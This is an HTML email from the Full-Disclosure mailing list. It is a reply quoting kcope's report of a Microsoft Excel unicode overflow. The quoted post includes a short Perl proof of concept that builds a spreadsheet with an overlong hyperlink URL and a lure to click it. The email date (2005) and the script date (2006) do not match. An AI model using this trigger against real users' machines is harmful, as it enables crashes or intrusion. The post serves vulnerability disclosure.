hello, kcope,<br><br>This is what I test in excel 2003 sp2, I haven't excel 2002 :&gt;<br><br>regards<br><br><br><div><span class="gmail_quote">2005/6/19, kcope &lt;<a href="mailto:kingcope@gmx.net">kingcope@gmx.net</a>&gt;:
</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Microsoft Excel Unicode Overflow<br><br>Hello this is kcope,<br>I found a unicode overflow in excel.
<br>It works in my version of excel, perhaps it is patched or something, I have<br>SP3. I know this is ultralame. Attached are some screenies.<br>Here are the warezcodez:<br><br>###############################<br># excelsexywarez.pl
<br># excel unicode overflow poc<br># by kcope in 2006<br># thanks to revoguard and alex<br>###############################<br>use Spreadsheet::WriteExcel;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;my $workbook = Spreadsheet::WriteExcel-&gt;new(&quot;FUCK.xls
&quot;);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;$worksheet = $workbook-&gt;add_worksheet();<br><br>&nbsp;&nbsp;&nbsp;&nbsp;$format = $workbook-&gt;add_format();<br>&nbsp;&nbsp;&nbsp;&nbsp;$format-&gt;set_bold();<br>&nbsp;&nbsp;&nbsp;&nbsp;$format-&gt;set_color('red');<br>&nbsp;&nbsp;&nbsp;&nbsp;$format-&gt;set_align('center');<br>
<br>&nbsp;&nbsp;&nbsp;&nbsp;$col = $row = 5;<br>&nbsp;&nbsp;&nbsp;&nbsp;$worksheet-&gt;write($row, $col, &quot;kcope in da house! Click on the<br>link!!!&quot;, $format);<br><br>&nbsp;&nbsp;&nbsp;&nbsp;$a=&quot;AAAAAAAAAAAAAAAAAAAAAA\\&quot; x 500;<br>&nbsp;&nbsp;&nbsp;&nbsp;$worksheet-&gt;write_url(0, 0, &quot;$a&quot;, &quot;LINK&quot;);
<br><br><br>- - kcdarookie<br><br><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br><br><br></blockquote></div><br>